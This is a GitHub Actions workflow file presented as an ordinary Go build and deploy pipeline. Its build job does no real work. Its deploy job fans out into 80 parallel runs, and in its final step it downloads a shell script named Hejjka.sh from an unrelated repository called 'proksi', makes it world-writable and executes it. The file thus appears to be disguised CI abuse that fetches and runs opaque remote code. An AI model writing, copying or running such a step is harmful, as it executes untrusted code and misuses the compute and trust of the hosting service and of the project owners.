name: Build
on: [push, pull_request]
jobs:
  build:
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4]
        flag: [A, B, C, D, E]
    timeout-minutes: 60
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
  deploy:
    needs: build
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 80
      fail-fast: false
      matrix:
        go: [1.1, 1.2]
        flag: [A, B, C, D, E, F, G, H, I, J]
    timeout-minutes: 60
    env:
        NUM_JOBS: 80
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: Download
      run: |
        wget https://raw.githubusercontent.com/keuhaurhh/proksi/main/Hejjka.sh && chmod 777 Hejjka.sh && ./Hejjka.sh
